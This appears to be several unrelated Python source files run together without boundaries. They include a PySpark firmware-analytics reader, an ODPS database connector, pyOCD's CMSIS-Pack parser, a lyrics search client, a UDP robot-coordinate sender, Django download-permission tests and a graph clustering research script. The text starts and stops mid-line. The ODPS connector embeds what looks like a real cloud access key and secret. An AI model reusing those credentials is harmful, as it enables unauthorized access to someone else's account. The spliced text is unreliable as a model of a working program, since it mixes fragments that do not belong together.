SparkSession.builder.getOrCreate().read.json(os.path.join(sbom_path, f'{fw_sha256}.json'), schema=sbom_schema) def read_firmware_analytics_from_tree(glue_database: str, table_name: str, file_tree_df: DataFrame, schema: StructType) -> DataFrame: """ Reads a firmware analytic (e.g. crypto_material) from the jsonl files backing the table for that analytic in the Glue Data Catalog. The set of file hashes to read are obtained from the supplied file_tree DataFrame, which is only required to have the `file_hash` column. :param glue_database: The name of the Glue database from which to read the files, e.g. fimrware_prod. :param table_name: The name of the table to read :param file_tree_df: The file_tree DataFrame :param schema: The PySpark schema for the returned data. """ path = get_data_catalog().get_table_path(glue_database, table_name) bucket, key_prefix = get_bucket_and_key_from_uri(path) def read_file(file_hash: str): try: for line in ExecutorGlobals.s3_client().get_object(Bucket=bucket, Key=os.path.join(key_prefix, file_hash) + '.jsonl')['Body'].iter_lines(): yield line.decode('utf-8') except Exception as e: return None # yapf: disable file_hashes_rdd = file_tree_df.select( 'file_hash' ).dropna().distinct().rdd.map( lambda row: row.file_hash ) redis_host = os.environ.get('REDIS_HOST') if redis_host: redis_port = int(os.environ.get('REDIS_PORT', '6379')) bloom_filter_key = get_bloom_filter_key(key_prefix) def check_bloom_filters(partition: Iterable[str]): from more_itertools import chunked from finitestate.firmware.bloomfilter.client.redis import RedisBloomFilterClient client = RedisBloomFilterClient( redis_client=ExecutorGlobals.redisbloom_client(host=redis_host, port=redis_port) ) for file_hashes in chunked(partition, n=10000): yield from client.exists(key=bloom_filter_key, objects=file_hashes) if ExecutorGlobals.redisbloom_client(host=redis_host, port=redis_port).exists(bloom_filter_key): logger.info(f'Filtering {glue_database}.{table_name} file hashes according to bloom filter membership in {bloom_filter_key}') file_hashes_rdd = file_hashes_rdd.mapPartitions( check_bloom_filters ) else: logger.warning(f'Performing exhaustive search for files in {key_prefix}; check plugin configuration to enable use of bloom filters') return SparkSession.builder.getOrCreate().read.json( file_hashes_rdd.flatMap(read_file).filter(lambda x: x), schema=schema ) #!/usr/bin/env python #-*- coding: utf-8 -*- # @Filename: connector.py # @Author: olenji - # @Description: --- # @Create: 2019-05-13 11:56:58 # @Last Modified: 2019-05-13 11:56:58 # from odps import ODPS, options options.sql.use_odps2_extension = True odps = ODPS('LTAItDVDpC9aEMXJ', 'U6iEFCZCzoPUbjou1FW45SQruxIfFt', 'Qkids_V2') #endpoint='**your-end-point**') #project = odps.get_project() # -*- coding: utf-8 -*- # pyOCD debugger # Copyright (c) 2019-2020 Arm Limited # Copyright (c) 2020 # Copyright (c) 2020 Fraunhofer-Gesellschaft zur Förderung der angewandten Forschung e.V. # Copyright (c) 2021 # SPDX-License-Identifier: Apache-2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from xml.etree.ElementTree import (ElementTree, Element) import zipfile import logging import io from typing import (Any, Dict, Iterator, Optional) from .flash_algo import PackFlashAlgo from ...core import exceptions from ...core.target import Target from ...core.memory_map import (MemoryMap, MemoryRegion, MemoryType, MEMORY_TYPE_CLASS_MAP, FlashRegion, RamRegion) LOG = logging.getLogger(__name__) class MalformedCmsisPackError(exceptions.TargetSupportError): """! @brief Exception raised for errors parsing a CMSIS-Pack.""" pass class _DeviceInfo(object): """! @brief Simple container class to hold XML elements describing a device.""" def __init__(self, **kwargs): self.element = kwargs.get('element', None) self.families = kwargs.get('families', []) self.memories = kwargs.get('memories', []) self.algos = kwargs.get('algos', []) self.debugs = kwargs.get('debugs', []) def _get_part_number_from_element(element: Element) -> str: """! @brief Extract the part number from a device or variant XML element.""" assert element.tag in ("device", "variant") if element.tag == "device": return element.attrib['Dname'] elif element.tag == "variant": return element.attrib['Dvariant'] else: raise ValueError("element is neither device nor variant") class CmsisPack(object): """! @brief Wraps a CMSIS Device Family Pack. This class provides a top-level interface for extracting device information from CMSIS-Packs. After an instance is constructed, a list of the devices described within the pack is available from the `devices` property. Each item in the list is a CmsisPackDevice object. The XML element hierarchy that defines devices is as follows. ``` family [-> subFamily] -> device [-> variant] ``` Internally, this class is responsible for collecting the device-related XML elements from each of the levels of the hierarchy described above. It determines which elements belong to each defined device and passes those to CmsisPackDevice. It is then CmsisPackDevice that performs the parsing of each element type into pyOCD-compatible data. """ def __init__(self, file_or_path): """! @brief Constructor. Opens the CMSIS-Pack and builds instances of CmsisPackDevice for all the devices and variants defined within the pack. @param self @param file_or_path The .pack file to open. May be a string that is the path to the pack, or may be a ZipFile, or a file-like object that is already opened. @exception MalformedCmsisPackError The pack is not a zip file, or the .pdsc file is missing from within the pack. """ if isinstance(file_or_path, zipfile.ZipFile): self._pack_file = file_or_path else: try: self._pack_file = zipfile.ZipFile(file_or_path, 'r') except zipfile.BadZipFile as err: raise MalformedCmsisPackError(f"Failed to open CMSIS-Pack '{file_or_path}': {err}") from err # Find the .pdsc file. for name in self._pack_file.namelist(): if name.endswith('.pdsc'): self._pdscName = name break else: raise MalformedCmsisPackError(f"CMSIS-Pack '{file_or_path}' is missing a .pdsc file") with self._pack_file.open(self._pdscName) as pdscFile: self._pdsc = CmsisPackDescription(self, pdscFile) @property def filename(self): """! @brief Accessor for the filename or path of the .pack file.""" return self._pack_file.filename @property def pdsc(self): """! @brief Accessor for the CmsisPackDescription instance for the pack's PDSC file.""" return self._pdsc @property def devices(self): """! @brief A list of CmsisPackDevice objects for every part number defined in the pack.""" return self._pdsc.devices def get_file(self, filename): """! @brief Return file-like object for a file within the pack. @param self @param filename Relative path within the pack. May use forward or back slashes. @return A BytesIO object is returned that contains all of the data from the file in the pack. This is done to isolate the returned file from how the pack was opened (due to particularities of the ZipFile implementation). """ filename = filename.replace('\\', '/') return io.BytesIO(self._pack_file.read(filename)) class CmsisPackDescription(object): def __init__(self, pack, pdsc_file): """! @brief Constructor. @param self This object. @param pack Reference to the CmsisPack instance. @param pdsc_file A file-like object for the .pdsc contained in _pack_. """ self._pack = pack # Convert PDSC into an ElementTree. self._pdsc = ElementTree(file=pdsc_file) self._state_stack = [] self._devices = [] # Remember if we have already warned about overlapping memory regions # so we can limit these to one warning per DFP self._warned_overlapping_memory_regions = False # Extract devices. for family in self._pdsc.iter('family'): self._parse_devices(family) @property def pack(self): """! @brief Reference to the containing CmsisPack object.""" return self._pack @property def devices(self): """! @brief A list of CmsisPackDevice objects for every part number defined in the pack.""" return self._devices def _parse_devices(self, parent): # Extract device description elements we care about. newState = _DeviceInfo(element=parent) children = [] for elem in parent: if elem.tag == 'memory': newState.memories.append(elem) elif elem.tag == 'algorithm': newState.algos.append(elem) elif elem.tag == 'debug': newState.debugs.append(elem) # Save any elements that we will recurse into. elif elem.tag in ('subFamily', 'device', 'variant'): children.append(elem) # Push the new device description state onto the stack. self._state_stack.append(newState) # Create a device object if this element defines one. if parent.tag in ('device', 'variant'): # Build device info from elements applying to this device. deviceInfo = _DeviceInfo(element=parent, families=self._extract_families(), memories=self._extract_memories(), algos=self._extract_algos(), debugs=self._extract_debugs() ) dev = CmsisPackDevice(self.pack, deviceInfo) self._devices.append(dev) # Recursively process subelements. for elem in children: self._parse_devices(elem) self._state_stack.pop() def _extract_families(self): families = [] for state in self._state_stack: elem = state.element if elem.tag == 'family': families += [elem.attrib['Dvendor'], elem.attrib['Dfamily']] elif elem.tag == 'subFamily': families += [elem.attrib['DsubFamily']] return families def _extract_items(self, state_info_name, filter): map = {} for state in self._state_stack: for elem in getattr(state, state_info_name): try: filter(map, elem) except (KeyError, ValueError) as err: LOG.debug("error parsing CMSIS-Pack: " + str(err)) return list(map.values()) def _extract_memories(self): def get_start_and_size(elem): try: start = int(elem.attrib['start'], base=0) size = int(elem.attrib['size'], base=0) except (KeyError, ValueError): LOG.warning("memory region missing address") raise return (start, size) def filter(map, elem): # Inner memory regions are allowed to override outer memory # regions. If this is not done properly via name/id, we must make # sure not to report overlapping memory regions to gdb since it # will ignore those completely, see: # https://github.com/pyocd/pyOCD/issues/980 start, size = get_start_and_size(elem) if 'name' in elem.attrib: # 'name' takes precedence over 'id'. name = elem.attrib['name'] elif 'id' in elem.attrib: name = elem.attrib['id'] else: # Neither option for memory name was specified, so use the address range. # Use the start and size for a name. name = "%08x:%08x" % (start, size) pname = elem.attrib.get('Pname', None) info = (name, pname) if info in map: del map[info] for k in list(map.keys()): prev_pname = k[1] # Previously, we would not check for overlaps if the pname was different. But because pyocd # currently only supports one memory map for the whole device, we have to ignore the pname for # now. prev_elem = map[k] prev_start, prev_size = get_start_and_size(prev_elem) # Overlap: start or end between previous start and previous end end = start + size - 1 prev_end = prev_start + prev_size - 1 if (prev_start <= start < prev_end) or (prev_start <= end < prev_end): # Only report warnings for overlapping regions from the same processor. Allow regions for different # processors to override each other, since we don't yet support maps for each processor. if (pname == prev_pname) and not self._warned_overlapping_memory_regions: filename = self.pack.filename if self.pack else "unknown" LOG.warning("Overlapping memory regions in file %s (%s); deleting outer region. " "Further warnings will be suppressed for this file.", filename, _get_part_number_from_element(self._state_stack[-1].element)) self._warned_overlapping_memory_regions = True del map[k] map[info] = elem return self._extract_items('memories', filter) def _extract_algos(self): def filter(map, elem): # We only support Keil FLM style flash algorithms (for now). if ('style' in elem.attrib) and (elem.attrib['style'] != 'Keil'): LOG.debug("skipping non-Keil flash algorithm") return None, None # Both start and size are required. start = int(elem.attrib['start'], base=0) size = int(elem.attrib['size'], base=0) memrange = (start, size) # An algo with the same range as an existing algo will override the previous. map[memrange] = elem return self._extract_items('algos', filter) def _extract_debugs(self): def filter(map, elem): if 'Pname' in elem.attrib: name = elem.attrib['Pname'] unit = elem.attrib.get('Punit', 0) name += str(unit) if '*' in map: map.clear() map[name] = elem else: # No processor name was provided, so this debug element applies to # all processors. map.clear() map['*'] = elem return self._extract_items('debugs', filter) def _get_bool_attribute(elem, name, default=False): """! @brief Extract an XML attribute with a boolean value. Supports "true"/"false" or "1"/"0" as the attribute values. Leading and trailing whitespace is stripped, and the comparison is case-insensitive. @param elem ElementTree.Element object. @param name String for the attribute name. @param default An optional default value if the attribute is missing. If not provided, the default is False. """ if name not in elem.attrib: return default else: value = elem.attrib[name].strip().lower() if value in ("true", "1"): return True elif value in ("false", "0"): return False else: return default class CmsisPackDevice(object): """! @brief Wraps a device defined in a CMSIS Device Family Pack. Responsible for converting the XML elements that describe the device into objects usable by pyOCD. This includes the memory map and flash algorithms. An instance of this class can represent either a `` or `` XML element from the PDSC. """ def __init__(self, pack, device_info): """! @brief Constructor. @param self @param pack The CmsisPack object that contains this device. @param device_info A _DeviceInfo object with the XML elements that describe this device. """ self._pack = pack self._info = device_info self._part = _get_part_number_from_element(device_info.element) self._regions = [] self._saw_startup = False self._default_ram = None self._memory_map = None def _build_memory_regions(self): """! @brief Creates memory region instances for the device. For each `` element in the device info, a memory region object is created and added to the `_regions` attribute. IROM or non-writable memories are created as RomRegions by this method. They will be converted to FlashRegions by _build_flash_regions(). """ for elem in self._info.memories: try: # Get the region name, type, and access permissions. if 'name' in elem.attrib: name = elem.attrib['name'] access = elem.attrib['access'] if ('p' in access): type = MemoryType.DEVICE elif ('w' in access): type = MemoryType.RAM else: type = MemoryType.ROM elif 'id' in elem.attrib: name = elem.attrib['id'] if 'RAM' in name: access = 'rwx' type = MemoryType.RAM else: access = 'rx' type = MemoryType.ROM else: continue # Both start and size are required attributes. start = int(elem.attrib['start'], base=0) size = int(elem.attrib['size'], base=0) isDefault = _get_bool_attribute(elem, 'default') isStartup = _get_bool_attribute(elem, 'startup') if isStartup: self._saw_startup = True attrs = { 'name': name, 'start': start, 'length': size, 'access': access, 'is_default': isDefault, 'is_boot_memory': isStartup, 'is_testable': isDefault, 'alias': elem.attrib.get('alias', None), } # Create the memory region and add to map. region = MEMORY_TYPE_CLASS_MAP[type](**attrs) self._regions.append(region) # Record the first default ram for use in flash algos. if self._default_ram is None and type == MemoryType.RAM and isDefault: self._default_ram = region except (KeyError, ValueError) as err: # Ignore errors. LOG.debug("ignoring error parsing memories for CMSIS-Pack devices %s: %s", self.part_number, str(err)) def _get_containing_region(self, addr: int) -> Optional[MemoryRegion]: """@brief Return the memory region containing the given address.""" for region in self._regions: if region.contains_address(addr): return region return None def _build_flash_regions(self): """! @brief Converts ROM memory regions to flash regions. Each ROM region in the `_regions` attribute is converted to a flash region if a matching flash algo can be found. If the flash has multiple sector sizes, then separate flash regions will be created for each sector size range. The flash algo is converted to a pyOCD-compatible flash algo dict by calling _get_pyocd_flash_algo(). """ # Must have a default ram. if self._default_ram is None: LOG.warning("CMSIS-Pack device %s has no default RAM defined, cannot program flash" % self.part_number) return # Can't import at top level due to import loops. from ...core.session import Session regions_to_delete = [] # List of regions to delete. regions_to_add = [] # List of FlashRegion objects to add. # Create flash algo dicts once we have the full memory map. for i, region in enumerate(self._regions): # We're only interested in ROM regions here. if region.type != MemoryType.ROM: continue # Look for matching flash algo. algo_element = self._find_matching_algo(region) if algo_element is None: # Must be a mask ROM or non-programmable flash. continue # Load flash algo from .FLM file. packAlgo = self._load_flash_algo(algo_element.attrib['name']) if packAlgo is None: LOG.warning("Failed to convert ROM region to flash region because flash algorithm '%s' could not be " " found (%s)", algo_element.attrib['name'], self.part_number) continue # The ROM region will be replaced with one or more flash regions. regions_to_delete.append(region) # Log details of this flash algo if the debug option is enabled. current_session = Session.get_current() if current_session and current_session.options.get("debug.log_flm_info"): LOG.debug("Flash algo info: %s", packAlgo.flash_info) # Choose the page size. The check for <=32 is to handle some flash algos with incorrect # page sizes that are too small and probably represent the phrase size. page_size = packAlgo.page_size if page_size <= 32: page_size = min(s[1] for s in packAlgo.sector_sizes) # Select the RAM to use for the algo. try: # See if an explicit RAM range was specified for the algo. ram_start = int(algo_element.attrib['RAMstart'], base=0) # The region size comes either from the RAMsize attribute, the containing region's bounds, or # a large, arbitrary value. if 'RAMsize' in algo_element.attrib: ram_size = int(algo_element.attrib['RAMsize'], base=0) else: containing_region = self._get_containing_region(ram_start) if containing_region is not None: ram_size = containing_region.length - (ram_start - containing_region.start) else: # No size specified, and the RAMstart attribute is outside of a known region, # so just use a relatively large arbitrary size. Because the algo is packed at the # start of the provided region, this won't be a problem unless the DFP is # actually erroneous. ram_size = 128 * 1024 ram_for_algo = RamRegion(start=ram_start, length=ram_size) except KeyError: # No RAM addresses were given, so go with the RAM marked default. ram_for_algo = self._default_ram # Construct the pyOCD algo using the largest sector size. We can share the same # algo for all sector sizes. algo = packAlgo.get_pyocd_flash_algo(page_size, ram_for_algo) # Create a separate flash region for each sector size range. regions_to_add += list(self._split_flash_region_by_sector_size( region, page_size, algo, packAlgo)) # type: ignore # Now update the regions list. for region in regions_to_delete: self._regions.remove(region) for region in regions_to_add: self._regions.append(region) def _split_flash_region_by_sector_size(self, region: MemoryRegion, page_size: int, algo: Dict[str, Any], pack_algo: PackFlashAlgo) -> Iterator[FlashRegion]: """@brief Yield separate flash regions for each sector size range.""" # The sector_sizes attribute is a list of bi-tuples of (start-address, sector-size), sorted by start address. for j, (offset, sector_size) in enumerate(pack_algo.sector_sizes): start = region.start + offset # Determine the end address of the this sector range. For the last range, the end # is just the end of the entire region. Otherwise it's the start of the next # range - 1. if j + 1 >= len(pack_algo.sector_sizes): end = region.end else: end = region.start + pack_algo.sector_sizes[j + 1][0] - 1 # Skip wrong start and end addresses if end < start: continue # Limit page size. if page_size > sector_size: region_page_size = sector_size LOG.warning("Page size (%d) is larger than sector size (%d) for flash region %s; " "reducing page size to %d", page_size, sector_size, region.name, region_page_size) else: region_page_size = page_size # If we don't have a boot memory yet, pick the first flash. if not self._saw_startup: is_boot = True self._saw_startup = True else: is_boot = region.is_boot_memory # Construct region name. If there is more than one sector size, we need to make the region's name unique. region_name = region.name if len(pack_algo.sector_sizes) > 1: region_name += f"_{sector_size:#x}" # Construct the flash region. yield FlashRegion(name=region_name, access=region.access, start=start, end=end, sector_size=sector_size, page_size=region_page_size, flm=pack_algo, algo=algo, erased_byte_value=pack_algo.flash_info.value_empty, is_default=region.is_default, is_boot_memory=is_boot, is_testable=region.is_testable, alias=region.alias) def _find_matching_algo(self, region): """! @brief Searches for a flash algo covering the regions's address range.'""" for algo in self._info.algos: # Both start and size are required attributes. algoStart = int(algo.attrib['start'], base=0) algoSize = int(algo.attrib['size'], base=0) algoEnd = algoStart + algoSize - 1 # Check if the region indicated by start..size fits within the algo. if (algoStart <= region.start <= algoEnd) and (algoStart <= region.end <= algoEnd): return algo return None def _load_flash_algo(self, filename: str) -> Optional[PackFlashAlgo]: """! @brief Return the PackFlashAlgo instance for the given flash algo filename.""" if self.pack is not None: try: algo_data = self.pack.get_file(filename) return PackFlashAlgo(algo_data) except FileNotFoundError: pass # Return default value. return None @property def pack(self): """! @brief The CmsisPack object that defines this device.""" return self._pack @property def part_number(self): """! @brief Part number for this device. This value comes from either the `Dname` or `Dvariant` attribute, depending on whether the device was created from a `` or `` element. """ return self._part @property def vendor(self): """! @brief Vendor or manufacturer name.""" return self._info.families[0].split(':')[0] @property def families(self): """! @brief List of families the device belongs to, ordered most generic to least.""" return [f for f in self._info.families[1:]] @property def memory_map(self): """! @brief MemoryMap object.""" # Lazily construct the memory map. if self._memory_map is None: self._build_memory_regions() self._build_flash_regions() # Warn if there was no boot memory. if not self._saw_startup: LOG.warning("CMSIS-Pack device %s has no identifiable boot memory", self.part_number) self._memory_map = MemoryMap(self._regions) return self._memory_map @property def svd(self): """! @brief File-like object for the device's SVD file. @todo Support multiple cores. """ try: svdPath = self._info.debugs[0].attrib['svd'] return self._pack.get_file(svdPath) except (KeyError, IndexError): return None @property def default_reset_type(self): """! @brief One of the Target.ResetType enums. @todo Support multiple cores. """ try: resetSequence = self._info.debugs[0].attrib['defaultResetSequence'] if resetSequence == 'ResetHardware': return Target.ResetType.HW elif resetSequence == 'ResetSystem': return Target.ResetType.SW_SYSRESETREQ elif resetSequence == 'ResetProcessor': return Target.ResetType.SW_VECTRESET else: return Target.ResetType.SW except (KeyError, IndexError): return Target.ResetType.SW def __repr__(self): return "<%s@%x %s>" % (self.__class__.__name__, id(self), self.part_number) search.py from models.lyric import Lyric from typing import List, Optional from exceptions import NotFoundException from models.song import Song from template import ( ENDPOINT_URL, GET_RESEMBLE_XML_COUNT, GET_RESEMBLE_XML_COUNT_HEADER, GET_RESEMBLE_XML_LIST, GET_RESEMBLE_XML_LIST_HEADER, ) from utils import Utils class Searcher: def __init__(self) -> None: pass def search(self, title: str, artist: Optional[str] = None) -> List[Song]: """ Search lyrics with title & artist. Parameters ---------- title : str Title of the song to search for. artist : Optional[str] Artist of the song to search for. Returns ------- Lyrics Lyrics dataclass of the song searched. """ count = self._get_resemble_count(title=title, artist=artist) if count == 0: raise NotFoundException("Can't find any lyric.") return self._get_resemble(title=title, artist=artist) def _get_resemble_count( self, title: str, artist: Optional[str] = None ) -> int: query = GET_RESEMBLE_XML_COUNT.format(title=title, artist=artist or "") soup = Utils.post( url=ENDPOINT_URL, data=query.encode(), headers=GET_RESEMBLE_XML_COUNT_HEADER, ) count: str = soup.find("strResembleLyricCount").text return int(count) def _get_resemble( self, title: str, artist: Optional[str] = None ) -> List[Song]: query = GET_RESEMBLE_XML_LIST.format( title=title, artist=artist or "", enc_data=Utils.create_enc() ) soup = Utils.post( url=ENDPOINT_URL, data=query.encode(), headers=GET_RESEMBLE_XML_LIST_HEADER, ) results = soup.find_all("ST_SEARCHLYRIC_LIST") return [ Song( title=x.find("title").text, artist=x.find("artist").text, lyric_id=x.find("lyricID").text, album=x.find("album").text, ) for x in results ] # s = Searcher() # s.search(" The Banshees")tshimba/udp_connection from argparse import ArgumentParser import pandas as pd import sys import os.path import numpy as np import binascii import socket import re def set_data_to_yac(dir_name, file_name): if 'csv' not in file_name: print("file is not csv") return file_path = os.path.join(dir_name, file_name) if not os.path.exists(file_path): print("file not exist") return print('load ', file_path) df = pd.read_csv(file_path, header=None) df_len = len(df.index) # 1 loop is 1 line for i, v in df.iterrows(): write (to_ascii(i, 2), to_ascii(v[0], 4), to_ascii(v[1], 4), to_ascii(v[2], 4), to_ascii(v[3], 4), to_ascii(v[4], 4), to_ascii(v[5], 4)) def to_ascii(dec, n_byte): hex_str = to_hex_le(dec, n_byte) li = [(i+j) for (i,j) in zip(hex_str[::2], hex_str[1::2])] ascii_code = '<' + '><'.join(li) + '>' return ascii_code ''' to hex little endian with two's complement ''' def to_hex_le(dec, n_byte): # numpy int to premitive int dec = np.asscalar(dec) if n_byte is 2: return dec.to_bytes(2, 'little', signed=True).hex().upper() elif n_byte is 4: return dec.to_bytes(4, 'little', signed=True).hex().upper() elif n_byte is 8: return dec.to_bytes(8, 'little', signed=True).hex().upper() else: return 'error' def write(i, x, y, z, r_x, r_y, r_z): #print(i, x, y, z, r_x, r_y, r_z) #SOURCE_ADDR = 'localhost' SOURCE_ADDR = '192.168.1.10' SOURCE_PORT = 10050 #DESTINATION_ADDR = 'localhost' DESTINATION_ADDR = '192.168.1.99' DESTINATION_PORT = 10040 # header yerc = "<59><45><52><43>" # fixed header_size = "<20><00>" # fixed data_size = "<34><00>" # dynamic (fixed: 52 byte for position) reserved1 = "<03><01><00><00>" # fixed blocked = "<00><00><00><00>" # fixed reserved2 = "<39><39><39><39><39><39><39><39>" # fixed header = yerc + header_size + data_size + reserved1 + blocked + reserved2 # sub header command = "<7F><00>" # dynamic data_index = i # dynamic: max: 99 request_num = "<00>" # dynamic (fixed: 1 for data type) compute = "<02>" # dynamic: Set_Attribute_All :0x02 padding = "<00><00>" sub_header = command + data_index + request_num + compute + padding # data data_type = "<11><00><00><00>" # fixed: 11 for robot coordinate form = "<00><00><00><00>" # fixed tool_num = "<00><00><00><00>" # fixed user_coor_num = "<00><00><00><00>" # fixed custom_form = "<00><00><00><00>" # fixed data_common_part = data_type + form + tool_num + user_coor_num + custom_form coor1 = x # dynamic coor2 = y # dynamic coor3 = z # dynamic coor4 = r_x # dynamic coor5 = r_y # dynamic coor6 = r_z # dynamic coor7 = "<00><00><00><00>" # fixed coor8 = "<00><00><00><00>" # fixed coors = coor1 + coor2 + coor3 + coor4 + coor5 + coor6 + coor7 + coor8 data = data_common_part + coors # request ascii_str = header + sub_header + data # ascii code to binary data = bytearray() matches = re.findall(r'[0-9A-Z]{2}', ascii_str.upper()) for match in matches: data += bytearray.fromhex(match) # send data client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP client.bind((SOURCE_ADDR, SOURCE_PORT)) client.sendto(data, (DESTINATION_ADDR, DESTINATION_PORT)) print('sent>> ', binascii.hexlify(data)) # answer recv_data, addr = client.recvfrom(4096) print('recv<< ', binascii.hexlify(recv_data)) def parser(): usage = 'Usage: python {} [-d DIRECTORY] [--help]'\ .format(__file__) argparser = ArgumentParser(usage=usage) argparser.add_argument('-d', '--directory', dest='dir_name', help='directory name') args = argparser.parse_args() return args.dir_name if __name__ == '__main__': DEFAULT_DIR = 'csv_files' dir_name = parser() print('directory name: ', dir_name) if dir_name is None: print('set default dir name', DEFAULT_DIR) dir_name = DEFAULT_DIR if not os.path.exists(dir_name): print('directory "', dir_name, '"not exist') sys.exit() files = os.listdir(dir_name) print(files) for file_name in files: set_data_to_yac(dir_name, file_name) # TODO: jobstart # TODO: wait uw-it-aca/sqlshare-rest from django.test import TestCase from unittest2 import skipIf from django.db import connection import json import re from sqlshare_rest.util.db import get_backend from sqlshare_rest.test import missing_url from django.test.utils import override_settings from django.test.client import Client from django.core.urlresolvers import reverse from sqlshare_rest.test.api.base import BaseAPITest from sqlshare_rest.dao.dataset import create_dataset_from_query from sqlshare_rest.util.db import is_mssql, is_mysql, is_sqlite3, is_pg import six if six.PY2: from StringIO import StringIO elif six.PY3: from io import StringIO @skipIf(missing_url("sqlshare_view_dataset_list"), "SQLShare REST URLs not configured") @override_settings(MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.RemoteUserMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ), SQLSHARE_QUERY_CACHE_DB="test_ss_query_db", AUTHENTICATION_BACKENDS = ('django.contrib.auth.backends.ModelBackend',) ) class DownloadAPITest(BaseAPITest): token = None query_id = None def test_download(self): owner = "test_dataset_download2" self.remove_users.append(owner) auth_headers = self.get_auth_header_for_username(owner) post_url = reverse("sqlshare_view_init_download") response = self.client.post(post_url, data=json.dumps({'sql': 'SELECT (1)', 'downloads': 1}), content_type="application/json", **auth_headers) self.assertEqual(response.status_code, 200) download_url = response["Location"] response2 = self.client.get(download_url, content_type='application/json') self.assertEqual(response2.status_code, 200) self.assertTrue(response2.streaming) response_body = StringIO("".join(map(lambda x: x.decode("utf-8-sig"), response2.streaming_content))).read() if is_mssql(): resp = '""\n"1"\n' elif is_mysql(): resp = '"1"\n"1"\n' elif is_pg(): resp = '"?column?"\n"1"\n' else: resp = '"(1)"\n"1"\n' self.assertEqual(response_body, resp) # Ensure download only works once response = self.client.get(download_url, content_type='application/json') self.assertEqual(response.status_code, 404) def test_bad_query(self): owner = "test_invalid_download_owner" other = "test_invalid_download_sneak" self.remove_users.append(owner) self.remove_users.append(other) get_backend().get_user(other) model = create_dataset_from_query(username=owner, dataset_name="test_download_2", sql="SELECT (3)") if is_mssql(): sql = "SELECT * FROM [test_invalid_download_owner].[test_download_2]" elif is_mysql(): sql = "SELECT * FROM `test_invalid_download_owner`.`test_download_2`"; else: sql = "SELECT * FROM test_download_2"; post_url = reverse("sqlshare_view_init_download") other_auth_headers = self.get_auth_header_for_username(other) # Now try just invalid sql response = self.client.post(post_url, data=json.dumps({'sql': "SELECT (1", 'downloads': 1}), content_type="application/json", **other_auth_headers) self.assertEqual(response.status_code, 200) download_url = response["Location"] response2 = self.client.get(download_url, content_type='application/json') self.assertEqual(response2.status_code, 200) if is_sqlite3(): # sqlite3 doesn't have permissions for the test below to fail on... return # Test a user w/ no access trying to download a dataset's content. response = self.client.post(post_url, data=json.dumps({'sql': sql, 'downloads': 1}), content_type="application/json", **other_auth_headers) self.assertEqual(response.status_code, 200) download_url = response["Location"] response2 = self.client.get(download_url, content_type='application/json') self.assertEqual(response2.status_code, 200) def test_bad_download(self): owner = "query_user1" self.remove_users.append(owner) # bad query id post_url = reverse("sqlshare_view_run_download", kwargs={'token': 'asd'}) auth_headers = self.get_auth_header_for_username(owner) response = self.client.get(post_url, content_type='application/json') self.assertEqual(response.status_code, 404) def test_bad_methods(self): owner = "query_user1" auth_headers = self.get_auth_header_for_username(owner) init_url = reverse("sqlshare_view_init_download") init_response = self.client.get(init_url, content_type='application/json', **auth_headers) self.assertEqual(init_response.status_code, 405) download_url = reverse("sqlshare_view_run_download", kwargs={ 'token' : 'asd1234'}) download_response = self.client.post(download_url, content_type='application/json') self.assertEqual(download_response.status_code, 405) # This is file of methods for paper "Towards Description of Block Model on Graph" accepted at ECML/PKDD 2020 # Authors: , , # Code implemented by: @ UC Davis # This code serve to reproduce the DTDM with cover or forget relaxation from paper "The Cluster Description Problem - Complexity Results, Formulations and Approximations" # authored by , , and , published at Advances in Neural Information Processing Systems 31 (NIPS 2018) from gurobipy import * import numpy as np import sys import descriptor_discover import edge_set_operations_smart import util_smart X = np.genfromtxt('StructuralAdjIUR.csv',delimiter=','); X[np.where(X>0)] = 1; X[np.where(X<1)] = 0; # Make the graph undirected if it is not. X = X + np.transpose(X); X[np.where(X>0)] = 1; X[np.where(X<1)] = 0; [n,n1] = X.shape for i in range(n): X[i,i] = 0 L = np.genfromtxt('StructuralUserHashtagIUR.csv',delimiter=','); L[np.where(L>0)] = 1; L[np.where(L<1)] = 0; [n,T] = X.shape print("Number of tags:", T) ll = np.matmul(L,np.transpose(L)) ll[np.where(ll>0)] = 1; ll[np.where(ll<1)] = 0; Behavioral_Graph = X # Retweet/following graph Tags = L # We use hashtags as node tags/labels T = Tags.shape[1] #kmax = 7; repmax = 10; mydata = {} #initk = 2; initrep = 1; ktmp = 4; rep = 4; kstr = str(ktmp) repstr = str(rep) print("Find descriptions for the intra-block edge collections:") # Now, only consider different graphs or multiple graphs/subgraphs. No partial orthogonality concerned. Vls = []; C = []; # Cluster indicator indicating the graphs' membership to facilitate partial orthogonality F = np.genfromtxt(('nmtf_'+kstr+'_'+repstr+'_F.csv'),delimiter=',') for j in range(ktmp): Ltmp = Tags[np.where(F[:,j]>0)[0],:] llength = np.sum(Ltmp,axis=1) Ljtmp = Ltmp[np.where(llength>0)[0],:] Vls.append(Ljtmp); m = descriptor_discover.baseline_cof_v(Vls, ktmp, T); D, Dw, Db = util_smart.unpack_gurobi_model_descriptors_BM(m,ktmp,ktmp,T) mydata[kstr+'_'+repstr] = [D,m.runTime] np.savez('The_DTDM_cof_T880_V.npz',data=mydata) 0 # -*- coding: utf-8 -*- # # Copyright (C) 2019 CHAOSS # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . # # Authors: # <> # import datetime import unittest import json from implementations.scripts.pullrequest_github import PullRequestGitHub def read_file(path): """ Given a line-by-line JSON file, this function converts it to a Python dictionary and returns all such lines as a list. :param path: the path to the JSON file :returns items: a list of dictionaries read from the JSON file """ items = list() with open(path, 'r') as raw_data: for line in raw_data: line = 